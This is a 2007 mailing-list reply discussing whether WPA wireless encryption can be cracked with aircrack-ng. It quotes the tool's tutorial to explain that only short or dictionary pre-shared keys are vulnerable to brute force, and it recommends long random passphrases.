On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote: > Josh Paetzel wrote: > > When I looked in to this it seemed that the current state of affairs is > > that WPA can only be broken by brute-forcing the key. I don't recall if > > that could be done 'off-line' or not. My memory is that the needed info > > to attempt bruteforcing could be done by simply receiving....no need to > > attempt to associate to the AP was needed. I'm not really interested in > > disseminating links to tools that can be used to break wireless security, > > but simple google searches will give you the info you need.....and the > > tools are in the ports tree for the most part. > > > > Fortunately WPA allows keys that put even resource-rich attackers in to > > the decade range to bruteforce. > > That would not appear to be a limitation of aircrack-ng > http://www.freshports.org/net-mgmt/aircrack-ng/ > > aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can > recover this keys once enough encrypted packets have been captured. > It implements the standard FMS attack along with some optimizations > like KoreK attacks, thus making the attack much faster compared to > other WEP cracking tools. In fact aircrack is a set of tools for > auditing wireless networks. > > That said, I haven't (yet) tried it myself ;)
Well, if you were to read your own link for a bit you'd eventually find... http://www.aircrack-ng.org/doku.php?id=cracking_wpa Quoting from the page.... WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. -- Thanks, Josh Paetzel PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
signature.asc
Description: This is a digitally signed message part.
